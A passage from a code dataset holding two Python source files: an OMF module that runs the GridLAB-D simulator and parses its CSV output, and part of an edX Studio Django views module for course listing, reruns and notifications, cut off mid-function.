code stringlengths 3 1.05M | repo_name stringlengths 5 104 | path stringlengths 4 251 | language stringclasses 1 value | license stringclasses 15 values | size int64 3 1.05M |
|---|---|---|---|---|---|
''' Code for running Gridlab and getting results into pythonic data structures. '''
from __future__ import print_function
import sys, os, subprocess, platform, re, datetime, shutil, traceback, math, time, tempfile, json
from os.path import join as pJoin
from copy import deepcopy
# Locational variables so we don't have to rely on OMF being in the system path.
_myDir = os.path.dirname(os.path.abspath(__file__))
_omfDir = os.path.dirname(os.path.dirname(_myDir))
#sys.path.append(_omfDir)
# OMF imports.
import omf.feeder
def checkStatus(modelDir):
    '''Poll a running gridlabD simulation and print its percent complete.

    Reads the current gridlabD simulation time from stderr.txt, compares it
    to the total input simulation time and reports progress as
    'floatPercentageStatus' (0.0 - 1.0). Blocks, polling once per second,
    until the simulation for the first feeder finishes.
    '''
    # TODO: Work with all feeders; take average of all feeders
    # currently gridlabD does 1 feeder at a time (1 stderr available at a time.)
    # Resources decision: Can we afford to push each feeder to a separate process??
    # Seconds per supported simLengthUnits value, used for progress math below.
    secondsPerUnit = {'hours': 3600.0, 'days': 86400.0, 'minutes': 60.0}
    def getFloatPercentage(workDir, endDate, simLength, simLengthUnits):
        '''Parse the newest "Processing <timestamp> PST..." line from stderr.txt
        and turn it into a fraction complete. Returns 0.0 when the file is
        missing, not yet parseable, or the units are unrecognized.'''
        # BUGFIX: initialize up front; previously this was unbound (UnboundLocalError
        # at the return) when simLengthUnits was not hours/days/minutes.
        floatPercentageStatus = 0.0
        try:
            with open(pJoin(workDir, 'stderr.txt'), 'r') as stderrFile:
                gridlabDTime = stderrFile.read().strip()
            # gridlabD rewrites its progress line using carriage returns; the
            # last '\r'-separated chunk is the most recent progress report.
            gridlabDTest = gridlabDTime.split('\r')[-1]
            gridlabDTimeFormatted = gridlabDTest.split('Processing ')[1].split('PST...')[0].strip()
            gridlabDTimeFormatted = datetime.datetime.strptime(gridlabDTimeFormatted, '%Y-%m-%d %H:%M:%S')
            print("\n gridlabDTime=", gridlabDTimeFormatted)
            difference = endDate - gridlabDTimeFormatted
            print("\n difference=", difference)
            if simLengthUnits in secondsPerUnit:
                # Fraction complete = 1 - (time remaining / total time).
                unitsRemaining = difference.total_seconds() / secondsPerUnit[simLengthUnits]
                floatPercentageStatus = 1.0 - unitsRemaining / float(simLength)
        except:
            # stderr.txt absent or not yet in the expected format; report no progress.
            print("\n No std error file, passing.")
            floatPercentageStatus = 0.0
        return floatPercentageStatus
    def checkstdOutExists(workDir):
        '''Return True when stdout.txt exists and is non-empty, which signals
        that the gridlabD run for this feeder has completed.'''
        try:
            with open(pJoin(workDir, 'stdout.txt'), 'r') as stdOutFile:
                return stdOutFile.read().strip() != ""
        except:
            return False
    def convertSimLengthToEndDate(simStartDate, simLength, simLengthUnits):
        '''Compute the simulation end datetime from its start date, length and units.'''
        startDate = datetime.datetime.strptime(simStartDate, '%Y-%m-%d')
        if simLengthUnits == "hours":
            return startDate + datetime.timedelta(hours=float(simLength))
        elif simLengthUnits == "minutes":
            # BUGFIX: this branch previously tested simLengthUnits == "" so
            # minute-based simulations crashed with an UnboundLocalError.
            return startDate + datetime.timedelta(minutes=float(simLength))
        elif simLengthUnits == "days":
            return startDate + datetime.timedelta(days=float(simLength))
        # Unrecognized units: treat as zero-length rather than raising.
        return startDate
    with open(pJoin(modelDir, "allInputData.json")) as f:
        inputDict = json.load(f)
    (simStartDate, simLength, simLengthUnits) = \
        [inputDict[x] for x in ('simStartDate', 'simLength', 'simLengthUnits')]
    startDate = datetime.datetime.strptime(simStartDate, '%Y-%m-%d')
    endDate = convertSimLengthToEndDate(simStartDate, simLength, simLengthUnits)
    print("\n Simulation startDate=", startDate, ", endDate=", endDate)
    time.sleep(5)  # It takes about 5 seconds to start.
    # Reads stdErr output every second; stdErr sometimes doesn't end on the final
    # time, so if stdOut exists, the gridlabD simulation for the feeder is complete.
    for key in sorted(inputDict, key=inputDict.get):
        if key.startswith("feederName"):
            feederDir, feederName = inputDict[key].split("___")
            workDir = pJoin(modelDir, feederName)
            print("\n Computing progress for first feeder:", feederName)
            floatPercentageStatus = 0.0
            while floatPercentageStatus < 1.0:
                floatPercentageOld = floatPercentageStatus
                floatPercentageStatus = getFloatPercentage(workDir, endDate, simLength, simLengthUnits)
                # No forward progress plus a non-empty stdout means the run is done.
                if floatPercentageOld == floatPercentageStatus and checkstdOutExists(workDir):
                    print('\n The stdOut exists, so the gridlabD simulation is complete for feeder:', feederName)
                    floatPercentageStatus = 1.0
                    break
                print("\n Current percent complete: ", floatPercentageStatus)
                time.sleep(1)
def _addGldToPath():
    ''' Figure out what platform we're on and choose a suitable Gridlab binary.
    Sets the GRIDLABD/GLPATH environment variables for bundled builds.
    Returns full path to binary as result. '''
    enviro = os.environ
    if sys.platform == 'win32' or sys.platform == 'cygwin':
        # 64-bit and 32-bit Windows bundles live in sibling directories.
        subDir = "win64" if platform.machine().endswith('64') else "win32"
        binary = _myDir + "\\" + subDir + "\\gridlabd.exe"
        enviro['GRIDLABD'] = _myDir + "\\" + subDir
        enviro['GLPATH'] = _myDir + "\\" + subDir + "\\"
        return binary
    elif sys.platform == 'darwin':
        return _myDir + "/local_gd/bin/gridlabd"
    elif sys.platform.startswith('linux'):
        # BUGFIX: Python 3 reports sys.platform as 'linux', not 'linux2';
        # startswith covers both interpreter generations.
        binary = _myDir + "/linx64/gridlabd.bin"
        enviro['GRIDLABD'] = _myDir + "/linx64"
        enviro['GLPATH'] = _myDir + "/linx64"
        # Uncomment the following line if we ever get all the linux libraries bundled. Hard!
        # enviro['LD_LIBRARY_PATH'] = enviro['LD_LIBRARY_PATH'] + ':' + solverRoot + "/linx64"
        return binary
    else:
        # Platform not supported, so just return the standard binary and pray it works:
        return "gridlabd"
def runInFilesystem(feederTree, attachments=None, keepFiles=False, workDir=None, glmName=None):
    ''' Execute gridlab in the local filesystem. Return a nice dictionary of results.

    feederTree: OMF feeder tree dict to serialize to a .glm.
    attachments: dict of {fileName: contents} written alongside the .glm.
    keepFiles: when True, never delete the working directory.
    workDir: run here instead of a fresh temp dir (caller-owned, never deleted).
    glmName: optional name for the generated .glm file.
    Returns {} on any failure (details appended to workDir/stderr.txt).
    '''
    # BUGFIX: mutable default argument; a shared [] would also crash the
    # attachment-writing loop (it indexes attachments like a dict).
    if attachments is None:
        attachments = {}
    try:
        binaryName = _myDir + "/local_gd/bin/gridlabd"
        # Create a running directory and fill it, unless we've specified where we're running.
        # Track whether we made the directory: we only delete what we created.
        madeTempDir = workDir is None
        if madeTempDir:
            workDir = tempfile.mkdtemp()
            print("gridlabD runInFilesystem with no specified workDir. Working in", workDir)
        # Need to zero out lat/lon data on copy because it frequently breaks Gridlab.
        localTree = deepcopy(feederTree)
        for key in list(localTree.keys()):
            try:
                del localTree[key]["latitude"]
                del localTree[key]["longitude"]
            except:
                pass  # No lat lons.
        # Write attachments and glm.
        for attach in attachments:
            with open(pJoin(workDir, attach), 'w') as attachFile:
                attachFile.write(attachments[attach])
        glmString = omf.feeder.sortedWrite(localTree)
        if not glmName:
            glmName = "main." + datetime.datetime.now().strftime('%Y-%m-%d-%H-%M-%S') + ".glm"
        with open(pJoin(workDir, glmName), 'w') as glmFile:
            glmFile.write(glmString)
        # RUN GRIDLABD IN FILESYSTEM (EXPENSIVE!)
        with open(pJoin(workDir, 'stdout.txt'), 'w') as stdout, open(pJoin(workDir, 'stderr.txt'), 'w') as stderr, open(pJoin(workDir, 'PID.txt'), 'w') as pidFile:
            # MAYBEFIX: turn standerr WARNINGS back on once we figure out how to supress the 500MB of lines gridlabd wants to write...
            proc = subprocess.Popen([binaryName, '-w', glmName], cwd=workDir, stdout=stdout, stderr=stderr)
            pidFile.write(str(proc.pid))
            returnCode = proc.wait()
        # Build raw JSON output.
        rawOut = anaDataTree(workDir, lambda x: True)
        with open(pJoin(workDir, 'stderr.txt'), 'r') as stderrFile:
            rawOut['stderr'] = stderrFile.read().strip()
        with open(pJoin(workDir, 'stdout.txt'), 'r') as stdoutFile:
            rawOut['stdout'] = stdoutFile.read().strip()
        # Delete the folder and return.
        # NOTE: if the caller specified a working directory, don't blow it away.
        # BUGFIX: the old test `not keepFiles and not workDir` was always False
        # here (workDir is assigned above), so auto-created temp dirs leaked.
        if not keepFiles and madeTempDir:
            for attempt in range(5):
                try:
                    shutil.rmtree(workDir)
                    break
                except OSError:
                    # BUGFIX: WindowsError is a NameError on non-Windows Python 3;
                    # OSError covers it (WindowsError aliases OSError on Windows).
                    # HACK: if we don't sleep, windows intermittently fails to delete things.
                    # Probably cus dropbox is monkeying around in these folders on my dev machine.
                    time.sleep(2)
        return rawOut
    except:
        with open(pJoin(workDir, "stderr.txt"), "a+") as stderrFile:
            traceback.print_exc(file=stderrFile)
        return {}
def _strClean(x):
''' Helper function that translates csv values to reasonable floats (or header values to strings). '''
if x == 'OPEN':
return 1.0
elif x == 'CLOSED':
return 0.0
# Look for strings of the type '+32.0+68.32d':
elif x == '-1.#IND':
return 0.0
if x.endswith('d'):
matches = re.findall('^([+-]?\d+\.?\d*e?[+-]?\d+)[+-](\d+\.?\d*e?[+-]?\d*)d$',x)
if len(matches)==0:
return 0.0
else:
floatConv = list(map(float, matches[0]))
squares = [x**2 for x in floatConv]
return math.sqrt(sum(squares))
elif re.findall('^([+-]?\d+\.?\d*e?[+-]?\d*)$',x) != []:
matches = re.findall('([+-]?\d+\.?\d*e?[+-]?\d*)',x)
if len(matches)==0:
return 0.0
else:
try: return float(matches[0])
except: return 0.0 # Hack for crazy WTF occasional Gridlab output.
else:
return x
def csvToArray(fileName):
    ''' Take a Gridlab-export csv filename, return a list of timeseries vectors.'''
    with open(fileName) as openfile:
        rows = [line.split(',') for line in openfile.read().splitlines()]
    cleaned = [[_strClean(cell) for cell in row] for row in rows]
    # Magic number 8 is the number of header rows in each GridlabD csv.
    return cleaned[8:]
def _seriesTranspose(theArray):
''' Transpose every matrix that's a value in a dictionary. Yikes. '''
return {i[0]:list(i)[1:] for i in zip(*theArray)}
def anaDataTree(studyPath, fileNameTest):
    ''' Take a study and put all its data into a nested object {fileName:{metricName:[...]}} '''
    data = {}
    for fName in os.listdir(studyPath):
        # fileNameTest is evaluated first, matching the original short-circuit order.
        if fileNameTest(fName) and fName.endswith('.csv'):
            data[fName] = _seriesTranspose(csvToArray(studyPath + '/' + fName))
    return data
def _debug():
    '''Smoke-test the string cleaner, then do a full GridlabD run on a public feeder.'''
    print("Full path to Gridlab executable we're using:", _addGldToPath())
    print("Testing string cleaning.")
    strTestCases = [
        ("+954.877", 954.877),
        ("+2.18351e+006", 2183510.0),
        ("+7244.99+1.20333e-005d", 7244.99),
        # ("+7244.99+120d", 7245.98372204), # Fails due to float rounding but should pass.
        ("+3.76184", 3.76184),
        ("1", 1.0),
        ("-32.4", -32.4),
        ("+7200+0d", 7200.0),
        ("+175020+003133", 0.0),
    ]
    for rawValue, expected in strTestCases:
        assert _strClean(rawValue) == expected, "A _strClean operation failed on: " + rawValue
    # Get a test feeder and test climate.
    print("Testing GridlabD solver.")
    with open(pJoin(_omfDir, "static", "publicFeeders", "Simple Market System.omd"), "r") as feederFile:
        feederJson = json.load(feederFile)
    with open(pJoin(_omfDir, "data", "Climate", "AL-HUNTSVILLE.tmy2"), "r") as climateFile:
        tmyStr = climateFile.read()
    # Add climate in.
    feederJson["attachments"]["climate.tmy2"] = tmyStr
    testStudy = runInFilesystem(feederJson["tree"], feederJson["attachments"])
    assert testStudy != {}, "Gridlab run failed and we got blank output."
    print("GridlabD standard error:", testStudy['stderr'])
    print("GridlabD standard output:", testStudy['stdout'])
if __name__ == '__main__':
    # Run the smoke test when this module is executed directly (not on import).
    _debug()
| dpinney/omf | omf/solvers/gridlabd_gridballast/__init__.py | Python | gpl-2.0 | 10,839 |
"""
Views related to operations on course objects
"""
import copy
from django.shortcuts import redirect
import json
import random
import logging
import string # pylint: disable=deprecated-module
from django.utils.translation import ugettext as _
import django.utils
from django.contrib.auth.decorators import login_required
from django.conf import settings
from django.views.decorators.http import require_http_methods, require_GET
from django.core.exceptions import PermissionDenied
from django.core.urlresolvers import reverse
from django.http import HttpResponseBadRequest, HttpResponseNotFound, HttpResponse, Http404
from util.json_request import JsonResponse, JsonResponseBadRequest
from util.date_utils import get_default_time_display
from edxmako.shortcuts import render_to_response
from xmodule.course_module import DEFAULT_START_DATE
from xmodule.error_module import ErrorDescriptor
from xmodule.modulestore.django import modulestore
from xmodule.contentstore.content import StaticContent
from xmodule.tabs import CourseTab, CourseTabList, InvalidTabsException
from openedx.core.lib.course_tabs import CourseTabPluginManager
from openedx.core.djangoapps.credit.api import is_credit_course, get_credit_requirements
from openedx.core.djangoapps.credit.tasks import update_credit_course_requirements
from openedx.core.djangoapps.content.course_structures.api.v0 import api, errors
from openedx.core.djangoapps.self_paced.models import SelfPacedConfiguration
from xmodule.modulestore import EdxJSONEncoder
from xmodule.modulestore.exceptions import ItemNotFoundError, DuplicateCourseError
from opaque_keys import InvalidKeyError
from opaque_keys.edx.locations import Location
from opaque_keys.edx.keys import CourseKey
from django.views.decorators.csrf import ensure_csrf_cookie
from openedx.core.lib.js_utils import escape_json_dumps
from contentstore.course_info_model import get_course_updates, update_course_updates, delete_course_update
from contentstore.course_group_config import (
GroupConfiguration,
GroupConfigurationsValidationError,
RANDOM_SCHEME,
COHORT_SCHEME
)
from contentstore.courseware_index import CoursewareSearchIndexer, SearchIndexingError
from contentstore.utils import (
add_instructor,
initialize_permissions,
get_lms_link_for_item,
reverse_course_url,
reverse_library_url,
reverse_usage_url,
reverse_url,
remove_all_instructors,
)
from models.settings.course_details import CourseDetails, CourseSettingsEncoder
from models.settings.course_grading import CourseGradingModel
from models.settings.course_metadata import CourseMetadata
from util.json_request import expect_json
from util.string_utils import _has_non_ascii_characters
from student.auth import has_studio_write_access, has_studio_read_access
from .component import (
SPLIT_TEST_COMPONENT_TYPE,
ADVANCED_COMPONENT_TYPES,
)
from contentstore.tasks import rerun_course
from contentstore.views.entrance_exam import (
create_entrance_exam,
update_entrance_exam,
delete_entrance_exam
)
from .library import LIBRARIES_ENABLED
from .item import create_xblock_info
from contentstore.push_notification import push_notification_enabled
from course_creators.views import get_course_creator_status, add_user_with_status_unrequested
from contentstore import utils
from student.roles import (
CourseInstructorRole, CourseStaffRole, CourseCreatorRole, GlobalStaff, UserBasedRole
)
from student import auth
from course_action_state.models import CourseRerunState, CourseRerunUIStateManager
from course_action_state.managers import CourseActionStateItemNotFoundError
from microsite_configuration import microsite
from xmodule.course_module import CourseFields
from student.auth import has_course_author_access
from util.milestones_helpers import (
set_prerequisite_courses,
is_valid_course_key,
is_prerequisite_courses_enabled,
is_entrance_exams_enabled
)
log = logging.getLogger(__name__)
__all__ = ['course_info_handler', 'course_handler', 'course_listing',
'course_info_update_handler', 'course_search_index_handler',
'course_rerun_handler',
'settings_handler',
'grading_handler',
'advanced_settings_handler',
'course_notifications_handler',
'textbooks_list_handler', 'textbooks_detail_handler',
'group_configurations_list_handler', 'group_configurations_detail_handler']
class AccessListFallback(Exception):
    """
    Raised whenever course access cannot be resolved by the shorter
    group-based lookup and we must `fall back` to enumerating *all*
    courses available to a user.
    """
def get_course_and_check_access(course_key, user, depth=0):
    """
    Internal method used to calculate and return the locator and course module
    for the view functions in this file.
    """
    # Read access is the minimum bar for every Studio view in this module.
    if not has_studio_read_access(user, course_key):
        raise PermissionDenied()
    return modulestore().get_course(course_key, depth=depth)
def reindex_course_and_check_access(course_key, user):
    """
    Internal method used to restart indexing on a course.
    """
    # Reindexing mutates search state, so require author access, not just read.
    if not has_course_author_access(user, course_key):
        raise PermissionDenied()
    return CoursewareSearchIndexer.do_course_reindex(modulestore(), course_key)
@login_required
def course_notifications_handler(request, course_key_string=None, action_state_id=None):
    """
    Handle incoming requests for notifications in a RESTful way.

    course_key_string and action_state_id must both be set; else a HttpBadResponseRequest is returned.
    For each of these operations, the requesting user must have access to the course;
    else a PermissionDenied error is returned.

    GET
        json: return json representing information about the notification (action, state, etc)
    DELETE
        json: return json repressing success or failure of dismissal/deletion of the notification
    PUT
        Raises a NotImplementedError.
    POST
        Raises a NotImplementedError.
    """
    # Both identifiers are required before anything can be looked up.
    if not course_key_string or not action_state_id:
        return HttpResponseBadRequest()
    response_format = request.REQUEST.get('format', 'html')
    course_key = CourseKey.from_string(course_key_string)
    wants_json = (
        response_format == 'json' or
        'application/json' in request.META.get('HTTP_ACCEPT', 'application/json')
    )
    if not wants_json:
        # Notifications are a JSON-only API.
        return HttpResponseNotFound()
    if not has_studio_write_access(request.user, course_key):
        raise PermissionDenied()
    if request.method == 'GET':
        return _course_notifications_json_get(action_state_id)
    if request.method == 'DELETE':
        # we assume any delete requests dismiss actions from the UI
        return _dismiss_notification(request, action_state_id)
    if request.method in ('PUT', 'POST'):
        raise NotImplementedError()
    return HttpResponseBadRequest()
def _course_notifications_json_get(course_action_state_id):
    """
    Return the action and the action state for the given id
    """
    try:
        action_state = CourseRerunState.objects.find_first(id=course_action_state_id)
    except CourseActionStateItemNotFoundError:
        # Unknown notification id.
        return HttpResponseBadRequest()
    return JsonResponse({
        'action': action_state.action,
        'state': action_state.state,
        'should_display': action_state.should_display,
    })
def _dismiss_notification(request, course_action_state_id):  # pylint: disable=unused-argument
    """
    Update the display of the course notification
    """
    try:
        action_state = CourseRerunState.objects.find_first(id=course_action_state_id)
    except CourseActionStateItemNotFoundError:
        # Can't dismiss a notification that doesn't exist in the first place
        return HttpResponseBadRequest()
    if action_state.state == CourseRerunUIStateManager.State.FAILED:
        # A rerun that failed to be created needs no further access;
        # strip all remaining permissions for its course key.
        remove_all_instructors(action_state.course_key)
    # The UI no longer needs this record; drop it and report success.
    action_state.delete()
    return JsonResponse({'success': True})
# pylint: disable=unused-argument
@login_required
def course_handler(request, course_key_string=None):
    """
    The restful handler for course specific requests.
    It provides the course tree with the necessary information for identifying and labeling the parts. The root
    will typically be a 'course' object but may not be especially as we support modules.

    GET
        html: return course listing page if not given a course id
        html: return html page overview for the given course if given a course id
        json: return json representing the course branch's index entry as well as dag w/ all of the children
        replaced w/ json docs where each doc has {'_id': , 'display_name': , 'children': }
    POST
        json: create a course, return resulting json
        descriptor (same as in GET course/...). Leaving off /branch/draft would imply create the course w/ default
        branches. Cannot change the structure contents ('_id', 'display_name', 'children') but can change the
        index entry.
    PUT
        json: update this course (index entry not xblock) such as repointing head, changing display name, org,
        course, run. Return same json as above.
    DELETE
        json: delete this branch from this course (leaving off /branch/draft would imply delete the course)
    """
    try:
        response_format = request.REQUEST.get('format', 'html')
        if response_format == 'json' or 'application/json' in request.META.get('HTTP_ACCEPT', 'application/json'):
            if request.method == 'GET':
                # GET relies on the read-access check inside get_course_and_check_access.
                course_key = CourseKey.from_string(course_key_string)
                with modulestore().bulk_operations(course_key):
                    course_module = get_course_and_check_access(course_key, request.user, depth=None)
                    return JsonResponse(_course_outline_json(request, course_module))
            elif request.method == 'POST':  # not sure if this is only post. If one will have ids, it goes after access
                # NOTE(review): POST deliberately bypasses the write-access check
                # below — course creation has its own permission logic inside
                # _create_or_rerun_course. Keep the branch order intact.
                return _create_or_rerun_course(request)
            elif not has_studio_write_access(request.user, CourseKey.from_string(course_key_string)):
                # Write-access gate for the mutating verbs that follow (PUT/DELETE).
                raise PermissionDenied()
            elif request.method == 'PUT':
                raise NotImplementedError()
            elif request.method == 'DELETE':
                raise NotImplementedError()
            else:
                return HttpResponseBadRequest()
        elif request.method == 'GET':  # assume html
            if course_key_string is None:
                # No course specified: send the user to the Studio home/course listing.
                return redirect(reverse("home"))
            else:
                return course_index(request, CourseKey.from_string(course_key_string))
        else:
            return HttpResponseNotFound()
    except InvalidKeyError:
        # Malformed course_key_string: treat as a missing resource.
        raise Http404
@login_required
@ensure_csrf_cookie
@require_http_methods(["GET"])
def course_rerun_handler(request, course_key_string):
    """
    The restful handler for course reruns.
    GET
        html: return html page with form to rerun a course for the given course id
    """
    # Only global staff (PMs) are able to rerun courses during the soft launch
    if not GlobalStaff().has_user(request.user):
        raise PermissionDenied()
    course_key = CourseKey.from_string(course_key_string)
    with modulestore().bulk_operations(course_key):
        course_module = get_course_and_check_access(course_key, request.user, depth=3)
        if request.method == 'GET':
            context = {
                'source_course_key': course_key,
                'display_name': course_module.display_name,
                'user': request.user,
                'course_creator_status': _get_course_creator_status(request.user),
                'allow_unicode_course_id': settings.FEATURES.get('ALLOW_UNICODE_COURSE_ID', False),
            }
            return render_to_response('course-create-rerun.html', context)
@login_required
@ensure_csrf_cookie
@require_GET
def course_search_index_handler(request, course_key_string):
    """
    The restful handler for course indexing.
    GET
        html: return status of indexing task
        json: return status of indexing task
    """
    # Only global staff (PMs) are able to index courses
    if not GlobalStaff().has_user(request.user):
        raise PermissionDenied()
    course_key = CourseKey.from_string(course_key_string)
    # Echo the caller's content type back, defaulting to JSON.
    content_type = request.META.get('CONTENT_TYPE', None)
    if content_type is None:
        content_type = "application/json; charset=utf-8"
    with modulestore().bulk_operations(course_key):
        try:
            reindex_course_and_check_access(course_key, request.user)
        except SearchIndexingError as search_err:
            error_body = escape_json_dumps({"user_message": search_err.error_list})
            return HttpResponse(error_body, content_type=content_type, status=500)
        success_body = escape_json_dumps({"user_message": _("Course has been successfully reindexed.")})
        return HttpResponse(success_body, content_type=content_type, status=200)
def _course_outline_json(request, course_module):
    """
    Returns a JSON representation of the course module and recursively all of its children.
    """
    # Recurse into everything above the unit (vertical) level.
    def _should_expand(xblock):
        return xblock.category != 'vertical'
    return create_xblock_info(
        course_module,
        include_child_info=True,
        course_outline=True,
        include_children_predicate=_should_expand,
        user=request.user,
    )
def _accessible_courses_list(request):
    """
    List all courses available to the logged in user by iterating through all the courses
    """
    def course_filter(course):
        """
        Filter out unusable and inaccessible courses
        """
        # Broken courses come back from the modulestore as ErrorDescriptors.
        if isinstance(course, ErrorDescriptor):
            return False
        # pylint: disable=fixme
        # TODO remove this condition when templates purged from db
        if course.location.course == 'templates':
            return False
        return has_studio_read_access(request.user, course.id)

    courses = filter(course_filter, modulestore().get_courses())
    unsucceeded_actions = CourseRerunState.objects.find_all(
        exclude_args={'state': CourseRerunUIStateManager.State.SUCCEEDED}, should_display=True
    )
    in_process_course_actions = [
        action for action in unsucceeded_actions
        if has_studio_read_access(request.user, action.course_key)
    ]
    return courses, in_process_course_actions
def _accessible_courses_list_from_groups(request):
    """
    List all courses available to the logged in user by reversing access group names

    Raises AccessListFallback when any role is org-scoped (no course_id), in
    which case the caller must enumerate all courses instead.
    """
    courses_list = {}
    in_process_course_actions = []
    instructor_courses = UserBasedRole(request.user, CourseInstructorRole.ROLE).courses_with_role()
    staff_courses = UserBasedRole(request.user, CourseStaffRole.ROLE).courses_with_role()
    all_courses = instructor_courses | staff_courses
    for course_access in all_courses:
        course_key = course_access.course_id
        if course_key is None:
            # If the course_access does not have a course_id, it's an org-based role, so we fall back
            raise AccessListFallback
        if course_key not in courses_list:
            # check for any course action state for this course
            in_process_course_actions.extend(
                CourseRerunState.objects.find_all(
                    exclude_args={'state': CourseRerunUIStateManager.State.SUCCEEDED},
                    should_display=True,
                    course_key=course_key,
                )
            )
            # check for the course itself
            try:
                course = modulestore().get_course(course_key)
            except ItemNotFoundError:
                # If a user has access to a course that doesn't exist, don't do anything with that course
                # BUGFIX: previously `course` was left unbound here on the first
                # iteration (NameError) or kept the *previous* iteration's value,
                # so a missing course could be stored under the wrong key.
                course = None
            if course is not None and not isinstance(course, ErrorDescriptor):
                # ignore deleted or errored courses
                courses_list[course_key] = course
    return courses_list.values(), in_process_course_actions
def _accessible_libraries_list(user):
    """
    List all libraries available to the logged in user by iterating through all libraries
    """
    # No need to worry about ErrorDescriptors - split's get_libraries() never returns them.
    accessible = []
    for library in modulestore().get_libraries():
        if has_studio_read_access(user, library.location.library_key):
            accessible.append(library)
    return accessible
@login_required
@ensure_csrf_cookie
def course_listing(request):
    """
    List all courses available to the logged in user
    """
    courses, in_process_course_actions = get_courses_accessible_to_user(request)
    libraries = _accessible_libraries_list(request.user) if LIBRARIES_ENABLED else []

    def format_in_process_course_view(uca):
        """
        Return a dict of the data which the view requires for each unsucceeded course
        """
        is_failed = uca.state == CourseRerunUIStateManager.State.FAILED
        if is_failed:
            # Failed reruns get a dismiss link so the user can clear the notice.
            dismiss_link = reverse_course_url(
                'course_notifications_handler',
                uca.course_key,
                kwargs={'action_state_id': uca.id},
            )
        else:
            dismiss_link = ''
        return {
            'display_name': uca.display_name,
            'course_key': unicode(uca.course_key),
            'org': uca.course_key.org,
            'number': uca.course_key.course,
            'run': uca.course_key.run,
            'is_failed': is_failed,
            'is_in_progress': uca.state == CourseRerunUIStateManager.State.IN_PROGRESS,
            'dismiss_link': dismiss_link,
        }

    def format_library_for_view(library):
        """
        Return a dict of the data which the view requires for each library
        """
        library_key = library.location.library_key
        return {
            'display_name': library.display_name,
            'library_key': unicode(library_key),
            'url': reverse_library_url('library_handler', unicode(library_key)),
            'org': library.display_org_with_default,
            'number': library.display_number_with_default,
            'can_edit': has_studio_write_access(request.user, library_key),
        }

    courses = _remove_in_process_courses(courses, in_process_course_actions)
    in_process_course_actions = [format_in_process_course_view(uca) for uca in in_process_course_actions]
    context = {
        'courses': courses,
        'in_process_course_actions': in_process_course_actions,
        'libraries_enabled': LIBRARIES_ENABLED,
        'libraries': [format_library_for_view(lib) for lib in libraries],
        'show_new_library_button': LIBRARIES_ENABLED and request.user.is_active,
        'user': request.user,
        'request_course_creator_url': reverse('contentstore.views.request_course_creator'),
        'course_creator_status': _get_course_creator_status(request.user),
        'rerun_creator_status': GlobalStaff().has_user(request.user),
        'allow_unicode_course_id': settings.FEATURES.get('ALLOW_UNICODE_COURSE_ID', False),
        'allow_course_reruns': settings.FEATURES.get('ALLOW_COURSE_RERUNS', True),
    }
    return render_to_response('index.html', context)
def _get_rerun_link_for_item(course_key):
    """Build the URL of the rerun page for the given course key."""
    rerun_url = reverse_course_url('course_rerun_handler', course_key)
    return rerun_url
def _deprecated_blocks_info(course_module, deprecated_block_types):
    """
    Returns deprecation information about `deprecated_block_types`
    Arguments:
        course_module (CourseDescriptor): course object
        deprecated_block_types (list): list of deprecated blocks types
    Returns:
        Dict with following keys:
        block_types (list): list containing types of all deprecated blocks
        block_types_enabled (bool): True if any or all `deprecated_blocks` present in Advanced Module List else False
        blocks (list): List of `deprecated_block_types` component names and their parent's url
        advance_settings_url (str): URL to advance settings page
    """
    enabled = any(
        block_type in course_module.advanced_modules for block_type in deprecated_block_types
    )
    data = {
        'block_types': deprecated_block_types,
        'block_types_enabled': enabled,
        'blocks': [],
        'advance_settings_url': reverse_course_url('advanced_settings_handler', course_module.id),
    }
    try:
        structure_data = api.course_structure(course_module.id, block_types=deprecated_block_types)
    except errors.CourseStructureNotAvailableError:
        # No cached structure yet; report only the enabled flag and URLs.
        return data
    for block in structure_data['blocks'].values():
        parent_url = reverse_usage_url('container_handler', block['parent'])
        data['blocks'].append([parent_url, block['display_name']])
    return data
@login_required
@ensure_csrf_cookie
def course_index(request, course_key):
    """
    Display an editable course overview.

    org, course, name: Attributes of the Location for the item to edit
    """
    # A depth of None implies the whole course. The course outline needs this in order to compute has_changes.
    # A unit may not have a draft version, but one of its components could, and hence the unit itself has changes.
    with modulestore().bulk_operations(course_key):
        course_module = get_course_and_check_access(course_key, request.user, depth=None)
        if not course_module:
            raise Http404
        lms_link = get_lms_link_for_item(course_module.location)
        # Reindex link only shown when courseware search indexing is enabled.
        reindex_link = None
        if settings.FEATURES.get('ENABLE_COURSEWARE_INDEX', False):
            reindex_link = "/course/{course_id}/search_reindex".format(course_id=unicode(course_key))
        sections = course_module.get_children()
        course_structure = _course_outline_json(request, course_module)
        # 'show' query param: locator of an item the outline should expand and scroll to.
        locator_to_show = request.REQUEST.get('show', None)
        course_release_date = get_default_time_display(course_module.start) if course_module.start != DEFAULT_START_DATE else _("Unscheduled")
        settings_url = reverse_course_url('settings_handler', course_key)
        # current_action is the most recent displayable rerun state, or None.
        try:
            current_action = CourseRerunState.objects.find_first(course_key=course_key, should_display=True)
        except (ItemNotFoundError, CourseActionStateItemNotFoundError):
            current_action = None
        deprecated_blocks_info = _deprecated_blocks_info(course_module, settings.DEPRECATED_BLOCK_TYPES)
        return render_to_response('course_outline.html', {
            'context_course': course_module,
            'lms_link': lms_link,
            'sections': sections,
            'course_structure': course_structure,
            'initial_state': course_outline_initial_state(locator_to_show, course_structure) if locator_to_show else None,
            'rerun_notification_id': current_action.id if current_action else None,
            'course_release_date': course_release_date,
            'settings_url': settings_url,
            'reindex_link': reindex_link,
            'deprecated_blocks_info': deprecated_blocks_info,
            'notification_dismiss_url': reverse_course_url(
                'course_notifications_handler',
                current_action.course_key,
                kwargs={
                    'action_state_id': current_action.id,
                },
            ) if current_action else None,
        })
def get_courses_accessible_to_user(request):
    """
    Try to get all courses by first reversing django groups and fallback to old method if it fails
    Note: overhead of pymongo reads will increase if getting courses from django groups fails
    """
    if GlobalStaff().has_user(request.user):
        # user has global access so no need to get courses from django groups
        return _accessible_courses_list(request)
    try:
        return _accessible_courses_list_from_groups(request)
    except AccessListFallback:
        # user have some old groups or there was some error getting courses from django groups
        # so fallback to iterating through all courses
        return _accessible_courses_list(request)
def _remove_in_process_courses(courses, in_process_course_actions):
    """
    Filter out any in-process courses from ``courses`` and format the rest for the view.

    "In-process" refers to courses that are currently being generated for a
    re-run. ``ErrorDescriptor`` entries are dropped as well.

    Arguments:
        courses: iterable of course descriptors.
        in_process_course_actions: iterable of course actions whose
            ``course_key`` identifies a course that is mid-rerun.

    Returns:
        list of dicts with the fields the course listing view requires.
    """
    def format_course_for_view(course):
        """
        Return a dict of the data which the view requires for each course
        """
        return {
            'display_name': course.display_name,
